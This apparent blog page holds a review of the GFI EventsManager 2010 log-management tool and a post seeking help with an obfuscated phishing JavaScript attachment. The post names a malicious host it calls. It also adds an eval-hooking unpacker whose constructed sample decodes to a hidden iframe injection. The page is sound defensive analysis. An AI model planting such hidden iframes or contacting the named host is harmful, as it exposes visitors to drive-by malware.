GFI EventsManager 2010 Review

For a long time I have wanted to write a review of GFI EventsManager 2010, and I'm glad I'm finally doing it, because for me it's a very good example of software built the right way for the right job at the right time.

Having spent my last 5 years working with SIEM giants like ArcSight and RSA EnVision, I have experienced first-hand the benefits and sometimes the downfalls of SIEM / ESM solutions.

GFI EventsManager takes a simple and robust approach to log and event management, and this shows in the way it handles data collection, analysis, storage and reporting.

Data collection is agentless, which is a big plus, and the solution can collect and process Windows event logs, W3C-format logs, Syslog messages, SNMP traps and SQL Server logs. This covers the hardware and software systems most commonly found on a typical corporate network.

GFI EventsManager offers one of the best asset management interfaces in this class of product, allowing one to group assets (servers, workstations, network devices) and quickly display events filtered by numerous criteria.

The list of supported devices can be found here (a bit outdated; it needs an update for the 2010 version) and it includes top vendors in all major security domains: access control, perimeter, endpoint, directory services, content filtering, IDS / IPS, operating systems and much more.

The solution uses two collection engines: the Event Receiving Engine, which passively accepts data pushed to it, such as Syslog messages and SNMP traps, and the Event Retrieval Engine, which actively connects to systems to pull W3C and Windows event logs. Between them they cover all supported log formats.

Once the events reach the main processing unit, GFI EventsManager runs a set of event processing rules on them. The solution ships with a rich set of out-of-the-box rules, such as:

  • Classifying events as Critical, High, Medium, Low or Noise (Noise events are discarded)
  • Filtering events based on specific criteria
  • Triggering email, SMS and network alerts on key events
  • Triggering remediation actions such as the execution of executable files or scripts on key events
  • Optionally archiving collected events in the database backend.

GFI EventsManager uses an MS-SQL database backend, which can fill up quickly, so the solution provides functionality to archive the main stream of events to disk and keep only the important alerts in the database. Plan the classification rules with retention in mind: events classified as Noise are discarded before storage, so they will not be available for later forensic work.

Accessing the data is straightforward using the Event Browser, which does a great job of presenting events in an easy-to-read format. The Event Browser can also be used as a forensic analysis tool because of how easily it lets you drill into recorded events.

Reporting is done via the GFI ReportCenter framework, which offers consistent reporting features across many GFI products. A dedicated ReportPack for GFI EventsManager loads into the reporting framework, so you benefit from the framework's powerful reporting features tailored to the specific data provided by EventsManager.

Reports can be scheduled and sent by email or exported to various formats, including HTML, Adobe Acrobat (PDF), Excel (XLS), Word (DOC) and Rich Text Format (RTF).

Conclusion
GFI EventsManager 2010 is a very efficient and effective log and event management tool which covers most daily security monitoring activities. However, there is room to expand the product by adding support for more log sources (ODBC, flat text files, vendor-specific protocols like Check Point OPSEC, etc.). Event normalization and aggregation would also improve the in-memory correlation needed for more complex AI alerts.

Licensing is very affordable for this class of product and is based on the number of nodes reporting events. Also, don't forget that you can always download a fully working evaluation version from here.

My Twitter Notes on 2010-06-13


Help with JavaScript Malware !

I just received a phishing email today which had an HTML attachment and, of course, asked me to click the attached file.

By opening the attached file as text I noticed it's packed with scrambled / encoded JavaScript, which unfortunately I don't speak fluently.

I uploaded the file to my webserver and scanned it with the QualysGuard Malware Detection service, which runs discovered malware in a sandbox OS to detect its effects on an ordinary PC, but unfortunately I didn't get any results.

By unscrambling some URLs I found remote calls to http://onnoe.ru:8080/index.php?pid=10, which gave me a hint that this malware might be used as a trojan / botnet harvester.

So, I would appreciate it if anybody could take a look at the malware JavaScript and share the results with me. I'm extremely curious about what it does.

Anyway, here is the culprit JS code saved as txt.

Thank you!
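As an added note on the "unscrambling" step described in this post (example code written for this page, not the attachment's code and not the author's): packed phishing JavaScript usually decodes itself in layers and hands each layer to eval(), and the final layer writes a hidden iframe or script tag via document.write(). Instead of reading the encoded blob by hand, you can run the sample with eval and document replaced by hooks that record what they receive. The sample below is constructed and benign, the host payload.example.invalid stands in for the real one, and the helpers unpack/extractUrls are names chosen here.

```javascript
// Added example, not from the original post: a small "hook and capture" unpacker
// for obfuscated JavaScript. The sample gets replacement eval()/document.write()
// functions that record every string they receive, so each decoding layer is
// exposed without anything being rendered. new Function() still executes the
// sample, so run real attachments only inside a throwaway VM.

// Constructed, benign sample mimicking common packer output: the payload is hidden
// as a String.fromCharCode(...) list passed to eval, and the decoded stage injects a
// hidden iframe. The host name is a placeholder, not the one from the attachment.
const STAGE2 = `document.write('<iframe src="http://payload.example.invalid/index.php?pid=10" width=1 height=1></iframe>')`;
const SAMPLE = 'var z = String.fromCharCode(' +
  Array.from(STAGE2, (c) => c.charCodeAt(0)).join(',') +
  '); eval(z);';

const URL_RE = /https?:\/\/[^\s"'<>()]+/g;

// Runs `code` with hooked eval/document/window and returns everything captured.
// maxLayers guards against samples that re-encode themselves endlessly.
function unpack(code, maxLayers = 10) {
  const evalCalls = [];   // strings handed to eval(), outermost layer first
  const writes = [];      // strings handed to document.write()/writeln()
  let layers = 0;

  const fakeDocument = {
    write: (s) => { writes.push(String(s)); },
    writeln: (s) => { writes.push(String(s)); },
  };
  const fakeWindow = { document: fakeDocument };

  // Inside the sample, the identifier `eval` resolves to this parameter, so the
  // call is an ordinary function call, not a direct eval: we record the decoded
  // layer and then run it with the same hooks in place.
  function hookedEval(src) {
    if (typeof src !== 'string') return src; // real eval returns non-strings unchanged
    if (++layers > maxLayers) {
      throw new Error('unpack: too many eval layers (possible decoding loop)');
    }
    evalCalls.push(src);
    return runLayer(src);
  }
  function runLayer(src) {
    return new Function('eval', 'document', 'window', src)(hookedEval, fakeDocument, fakeWindow);
  }

  runLayer(code);
  return { evalCalls, writes, urls: extractUrls([...evalCalls, ...writes]) };
}

// Collects the distinct URLs found in all captured strings.
function extractUrls(strings) {
  const found = new Set();
  for (const s of strings) {
    for (const m of s.match(URL_RE) || []) found.add(m);
  }
  return [...found];
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = unpack(SAMPLE);
  console.log('eval layers :', r.evalCalls.length);
  console.log('decoded     :', r.evalCalls[0]);
  console.log('iframe html :', r.writes[0]);
  console.log('urls        :', r.urls);
}
```

Two caveats for real samples: this harness is not a sandbox, so use it only in an isolated VM, and many packers refuse to decode unless navigator, location or setTimeout look like a browser, so the fake window has to be extended until the decoded layer appears in evalCalls.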

My Twitter Notes on 2010-06-06

